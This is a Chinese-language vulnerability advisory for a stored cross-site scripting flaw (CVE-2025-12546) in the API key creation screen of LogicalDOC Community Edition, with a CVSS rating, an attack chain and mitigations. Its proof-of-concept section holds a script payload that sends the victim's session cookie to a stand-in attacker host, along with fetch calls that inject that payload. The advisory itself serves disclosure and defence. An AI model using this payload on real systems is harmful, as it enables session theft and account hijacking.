CVE-2025-12546: LogicalDOC Community Edition API Key创建界面跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-12546

漏洞类型

跨站脚本(XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

LogicalDOC Community Edition

漏洞概述

CVE-2025-12546是LogicalDOC Community Edition中发现的存储型跨站脚本(XSS)漏洞。该漏洞存在于API Key创建UI组件中，攻击者可以通过在API Key创建界面的输入字段中注入恶意JavaScript代码。当其他用户访问该页面或查看相关数据时，注入的恶意脚本将被执行，从而窃取用户会话cookie、劫持用户账户或进行其他恶意操作。由于该漏洞需要低权限用户交互才能触发，且影响范围限于机密性和完整性，CVSS评分仅为3.5，属于低危漏洞。LogicalDOC是一款开源的文档管理系统，广泛应用于企业文件管理和协作场景。

技术细节

该漏洞为存储型XSS，攻击者利用LogicalDOC Community Edition 9.2.1及更早版本中API Key创建UI组件对用户输入缺乏充分验证和过滤的缺陷。攻击者可以在API Key名称、描述或其他可输入字段中插入恶意JavaScript代码（如<script>alert(document.cookie)</script>）。由于系统在存储数据时未进行适当的输出编码，当管理员或普通用户查看API Key列表或相关管理界面时，浏览器会将这些未转义的数据作为HTML/JavaScript解析执行。攻击者可利用此漏洞窃取受害者Cookie、伪造用户操作、植入钓鱼页面或进一步横向移动。漏洞的利用需要攻击者拥有一定权限（低权限即可）且需要诱导受害者进行交互访问相关页面。

攻击链分析

STEP 1

步骤1

攻击者注册并登录LogicalDOC系统，获取低权限账户

STEP 2

步骤2

攻击者访问API Key创建界面，在名称或描述字段中注入恶意JavaScript代码

STEP 3

步骤3

系统将恶意代码存储到数据库中，未进行充分的输入验证和输出编码

STEP 4

步骤4

管理员或受害用户访问API Key管理页面，触发存储型XSS

STEP 5

步骤5

恶意脚本在受害者浏览器中执行，窃取Cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-12546 PoC - Stored XSS in LogicalDOC API Key Creation UI
// Target: LogicalDOC Community Edition <= 9.2.1

const payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';

// Step 1: Login to LogicalDOC with low-privilege account
const loginData = {
  username: 'lowpriv_user',
  password: 'password123'
};

fetch('https://target-logicaldoc.com/api/login', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify(loginData)
});

// Step 2: Navigate to API Key creation UI
// Inject XSS payload in API Key name field
const apiKeyData = {
  name: payload,  // XSS payload here
  description: 'API Key for testing',
  permissions: ['read', 'write']
};

fetch('https://target-logicaldoc.com/api/apikey/create', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Cookie': document.cookie
  },
  body: JSON.stringify(apiKeyData)
});

// When admin views the API Key list, the script executes

影响范围

LogicalDOC Community Edition <= 9.2.1

防御指南

临时缓解措施

在官方修复版本发布前，可通过以下措施临时缓解：1)限制低权限用户创建API Key的功能；2)在Web应用防火墙(WAF)中配置XSS防护规则；3)对API Key管理页面实施严格的输入验证；4)监控和审查API Key创建日志；5)考虑暂时禁用API Key功能（如果业务允许）。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12546
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12546
3 Details https://www.cvedetails.com/cve/CVE-2025-12546/
4 VulDB https://vuldb.com/cve/CVE-2025-12546
5 Link https://gist.github.com/thezeekhan/fa0dcfda4f1f915c625d3f89f8ec0529
6 Link https://vuldb.com/?ctiid.330806
7 Link https://vuldb.com/?id.330806
8 Link https://vuldb.com/?submit.677170